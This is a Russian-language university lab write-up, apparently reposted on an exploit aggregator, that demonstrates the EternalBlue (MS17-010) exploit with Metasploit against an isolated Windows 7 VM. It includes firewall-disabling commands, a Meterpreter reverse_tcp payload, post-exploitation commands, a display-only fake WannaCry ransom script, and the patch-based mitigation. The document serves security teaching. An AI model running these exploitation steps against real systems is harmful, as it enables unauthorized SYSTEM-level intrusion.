## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ICHHYAK22-ETERNALBLUE-EXPLOIT-DEMONSTRATION-MS17-010
# Демонстрация эксплойта EternalBlue (MS17-010)
Лабораторная работа по кибербезопасности, демонстрирующая эксплуатацию уязвимости CVE-2017-0144 (EternalBlue) с помощью Metasploit на уязвимой системе Windows 7 с получением доступа уровня SYSTEM через Meterpreter.
Этот проект также симулирует атаку программы-вымогателя типа WannaCry (БЕЗОПАСНАЯ ДЕМОНСТРАЦИЯ) и демонстрирует смягчение угрозы с помощью патча безопасности MS17-010.
* * *
## Module Information
**Модуль:** CSCM828 Security Vulnerabilities and Penetration Testing
**Студенты:**
* Daniel Nicolas Rentapalli (2548048)
* Ichhya Koirala (2607189)
**Университет:** Университет Суонси
* * *
## Resources & Downloads
1. **MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption**
https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/
2. **KB4012212 (Windows 7 x64 Security Update)**
https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212%20Windows%207%20x64
3. **Kali Linux (Загрузка виртуальных машин)**
https://www.kali.org/get-kali/#kali-virtual-machines
4. **Windows 7 SP1 Home Premium English x64 (ISO)**
https://archive.org/details/windows-7-home-prem-english
5. **VMware Workstation Pro**
https://www.vmware.com/products/desktop-hyper
* * *
## 1\. Обзор
В этой лабораторной работе демонстрируется:
* Удаленная эксплуатация уязвимости SMB (MS17-010)
* Доступ на уровне ядра через EternalBlue
* Установка сессии Meterpreter
* Методы постэксплуатации
* Симуляция программы-вымогателя типа WannaCry (безопасная)
* Смягчение угрозы с помощью патча
* * *
## 2\. Лабораторная среда
### Требования
* VMware Workstation / VirtualBox
* Минимум 8 ГБ ОЗУ
### Атакующая машина
* Kali Linux
* Metasploit Framework
### Целевая машина
* Windows 7 SP1 x64 (без патчей)
### Сеть
* Host-only / NAT (изолированная среда)
* Убедитесь, что обе машины могут взаимодействовать друг с другом
⚠️ Эта лабораторная работа должна проводиться в полностью изолированной среде.
* * *
## 3\. Настройка жертвы (Windows 7)
Запустите в командной строке от имени администратора:
### Отключение брандмауэра
root@kitploit:~
netsh advfirewall set allprofiles state off
### Проверка порта SMB
root@kitploit:~
netstat -an | findstr :445
### Отключение обновлений (для стабильности лаборатории)
root@kitploit:~
sc stop wuauserv
sc config wuauserv start= disabled
* * *
## 4\. Настройка атакующей машины (Kali Linux)
### Проверка соединения
root@kitploit:~
ping <victim-ip>
nmap -p 445 <victim-ip>
* * *
## 5\. Этапы эксплуатации
### Шаг 1: Сканирование цели
root@kitploit:~
nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>
Ожидаемый результат:
* Host is VULNERABLE
* * *
### Шаг 2: Запуск эксплойта
root@kitploit:~
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <victim-ip>
set LHOST <attacker-ip>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run
* * *
### Шаг 3: Подтверждение доступа
root@kitploit:~
meterpreter > getuid
Ожидаемый результат:
root@kitploit:~
NT AUTHORITY\SYSTEM
* * *
## 6\. Постэксплуатация
root@kitploit:~
sysinfo
getuid
ps
screenshot
shell
whoami
ipconfig
### Стабильная миграция
root@kitploit:~
ps
migrate <explorer.exe PID>
* * *
## 7\. Симуляция WannaCry (БЕЗОПАСНАЯ ДЕМОНСТРАЦИЯ)
### Создание полезной нагрузки (Kali)
root@kitploit:~
cat > /tmp/wannacry64.bat << 'EOF'
@echo off
title WannaCryptor Demo - SAFE SIMULATION
color 0a
mode con: cols=80 lines=25
cls
setlocal enabledelayedexpansion
set id=%random%-%random%-%random%
set /a timeleft=60
:main
cls
echo ========================================================
echo WANNA DECRYPTOR 0.4 x64 (DEMO)
echo ========================================================
echo.
echo All files have been encrypted!
echo.
echo Send 0.25 BTC to:
echo 13AM4VWSEwlt4cLnoQNFfqJDwZ8m9dkVml
echo.
echo Personal ID: %id%
echo.
echo Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.
echo Initializing encryption...
timeout /t 2 >nul
for /l %%i in (1,1,20) do (
set /a percent=%%i*5
call :progress !percent!
timeout /t 1 >nul
)
goto countdown
:progress
set bar=
set /a blocks=%1/5
for /l %%b in (1,1,!blocks!) do set bar=!bar!#
cls
echo ========================================================
echo ENCRYPTING FILES...
echo ========================================================
echo.
echo Progress: [%bar%] %1%%
echo.
set /a randfile=%random% %% 5
if !randfile!==0 echo Encrypting: documents.docx
if !randfile!==1 echo Encrypting: photos.jpg
if !randfile!==2 echo Encrypting: database.sql
if !randfile!==3 echo Encrypting: backup.zip
if !randfile!==4 echo Encrypting: project.pptx
exit /b
:countdown
cls
:loop
cls
echo ========================================================
echo YOUR FILES ARE ENCRYPTED
echo ========================================================
echo.
echo Pay within the time limit or files will be lost!
echo.
echo Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.
if !timeleft! LEQ 0 goto end
set /a timeleft-=1
timeout /t 1 >nul
goto loop
:end
cls
echo ========================================================
echo TIME EXPIRED
echo ========================================================
echo.
echo Your files are permanently locked.
echo.
echo (This was a SAFE DEMO simulation)
echo.
echo ========================================================
pause
EOF
* * *
### Загрузка и выполнение
root@kitploit:~
meterpreter > upload /tmp/wannacry64.bat C:\\Windows\\Temp\\wannacry64.bat
meterpreter > execute -f cmd.exe -a "/c start C:\Windows\Temp\wannacry64.bat"
* * *
## 8\. Смягчение (Демонстрация патча)
### Шаг 1: Загрузка патча
* Посетите: https://www.catalog.update.microsoft.com/
* Найдите: **KB4012212 Windows 7 x64**
* Загрузите `.msu` файл
* * *
### Шаг 2: Установка патча
root@kitploit:~
wusa.exe KB4012212-x64.msu /quiet /norestart
* * *
### Шаг 3: Перезагрузка
root@kitploit:~
shutdown /r /t 0
* * *
### Шаг 4: Проверка установки патча
root@kitploit:~
systeminfo | findstr KB4012212
* * *
### Шаг 5: Повторный запуск эксплойта
Ожидаемый результат:
* Эксплойт не удается
* Нет сессии Meterpreter
* * *
### Шаг 6: Проверка с помощью Nmap
root@kitploit:~
nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>
Ожидаемый результат:
* NOT VULNERABLE
* * *
## 9\. Устранение неполадок
Проблема| Решение
---|---
Эксплойт не удается| Проверьте соединение
Нет сессии| Отключите брандмауэр
Сессия прерывается| Повторите эксплойт
Нет видимого окна| Переместитесь в explorer.exe
* * *
## 10\. Этические соображения
Этот проект проводится:
* Только на контролируемых лабораторных машинах
* В полностью изолированной сети
* Только в образовательных целях
Несанкционированное использование нарушает:
* UK Computer Misuse Act 1990
* * *
## 11\. Заключение
Эта лабораторная работа демонстрирует:
* Реальную эксплуатацию SMB с помощью EternalBlue
* Компрометацию Windows 7 на уровне SYSTEM
* Симуляцию атаки программы-вымогателя (безопасная)
* Важность своевременного установки патчей